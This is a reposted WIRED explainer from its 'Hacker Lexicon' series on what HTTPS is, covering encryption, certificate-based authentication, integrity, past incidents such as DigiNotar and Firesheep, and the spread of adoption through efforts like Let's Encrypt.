Hacker Lexicon: What Is HTTPS?

Posted on Posted in Hacker Lexicon, Hacker News

FOR ALL THE attention that the iPhone’s encrypted storage and Whatsapp’s new end-to-end messaging encryption have gotten over the last few months—particularly from the US Justice Department—you’d think that encryption is just now hitting the mainstream. But in fact, you and billions of other people been using a less-loudly appreciated form of strong encryption for decades: HTTPS.


HTTPS, or Hypertext Transfer Protocol with an S appended for “Secure,” is the form of encryption that keeps your credit card data and passwords safe every time you enter them on a website that has even an ounce of security savvy. On a regular HTTP site, by contrast, that data can be intercepted, spied on and even altered by anyone between you and the site’s server—a snoop on the same Starbucks Wi-Fi connection, the internet service provider, or the NSA.

When you visit a regular HTTP website, the web server responds to requests from your browser and simply hands over the website’s unencrypted data. When you visit an HTTPS site, however, your browser and the server first perform an exchange of cryptographic keys. Those keys allow the server and browser to send messages only the other one can decrypt, locking out all eavesdroppers.

“We all know the adage that the Internet is like a series of tubes,” says Peter Eckersley, a technologist with the Electronic Frontier Foundation, using former senator Ted Stevens’ much-mocked but actually-pretty-useful internet analogy. “If you use HTTP, those tubes are totally transparent. Anyone along the way can look inside and see exactly what you’re doing,” he says. Switch to HTTPS, on the other hand, and “those tubes become opaque. Only people at the end can see what’s traveling through them.

Renewed Interest

HTTPS, which protects web traffic using an encryption protocol called SSL or TLS, has existed for more than two decades; it was first integrated into the web browser Netscape Navigator in 1994. But in just the last few years, it’s been undergoing a kind of accelerating renaissance: Whereas HTTPS once was used almost exclusively to protect ecommerce and login pages, web administrators are increasingly rolling out encryption to other sorts of pages, from social media to government sites to news outlets. (Including the one you’re looking at. Stay tuned.)

Today, more than 42 percent of web visits are to pages that use HTTPS, up from less than 38 percent just last summer, by Mozilla’s count. And that increase is due to a growing recognition that HTTPS offers more than just security for your most sensitive personal information, says the EFF’s Eckersley. It also protects what he describes as “the right to read in private.” A visitor to Wikipedia might be learning about a medical condition they may suffer from. Someone searching Craigslist at their office could be looking for a new job. A student reading the Washington Post might be following transgender political issues. All of those activities, Eckersley argues, deserve to be protected from an internet provider, employer, or school administrator just as much as the person’s credit card number. (And fortunately, he points out, Craigslist, Wikipedia, and the Washington Post now all use HTTPS across their sites.)

Proof of Identity

In fact, HTTPS protects more than confidentiality. It also offers authentication and what website administrators call “integrity.” For a site to register in a browser as HTTPS encrypted—noted with a padlock in the browser’s address bar—it needs to authenticate itself: to prove that it’s the site it says it is, rather than an impostor. To do that, a website’s administrator asks a “certificate authority” company like Comodo or Symantec to issue the site a “certificate,” a cryptographic key that in theory can’t be forged. Though certificate authorities have occasionally been hacked, like in the case of the Dutch firm Diginotar in 2011, breaking that system of trust. But in general, a certificate means that when your browser says you’re at https://google.com, you really are sharing your data with a Google server and no one else.

As for “integrity,” HTTPS also prevents any interloper on your local network from tampering with or partially blocking the contents of a site on its way from a server to your browser. Without HTTPS, a government censor can choose to block certain pages of a site or even just parts of a page. More active tampering could allow an internet service provider to insert ads or hackers to inject code designed to compromise your computer. Last year the Chinese government even used a similar trick to add a script to the homepage of the Chinese search engine Baidu that triggered visitors’ browsers to request information from the Chinese version of the New York Times and the code repository Github, knocking both sites offline.

Learning From Hacks

Attacks like those have raised awareness that HTTPS is important for more than privacy, says Josh Aas, a Mozilla engineer and the founder of the HTTPS-focused non-profit Let’s Encrypt which has helped somewhere around 4 million sites turn on HTTPS in just the past six months. But he also points to more purposeful warnings about the danger of unencrypted HTTP sites. In 2010, a programmer named Eric Butler released a simple Firefox plugin called Firesheep that allowed anyone to spy on the unencrypted connections of people browsing the same network as them, leading to a flurry of privacy concerns and sparking social media networks like Twitter and Facebook to extend encryption to their entire sites. Edward Snowden’s NSA leaks also made clear how much unencrypted data the NSA was siphoning en masse from the internet, renewing people’s interest in protecting their connections. “The problem just became much more clear over the past five or so years,” says Aas.

But even with a growing awareness of the importance of HTTPS, there is a lot of work to do. A report from Google just last month showed that 79 of the 100 most highly trafficked websites on the internet still do not yet use HTTPS encryption. And according to Mozilla, only 438,000 of the Alexa top 1 million sites offer HTTPS.

“Most users still don’t know about HTTPS, and even if they do, they don’t have any control over it. They have to either transmit their data in the clear or go somewhere else,”says Aas. “If we’re going to protect those people, we need to get websites to adopt HTTPS…It’s really a lynchpin in the internet’s security right now.”

Quelle: WIRED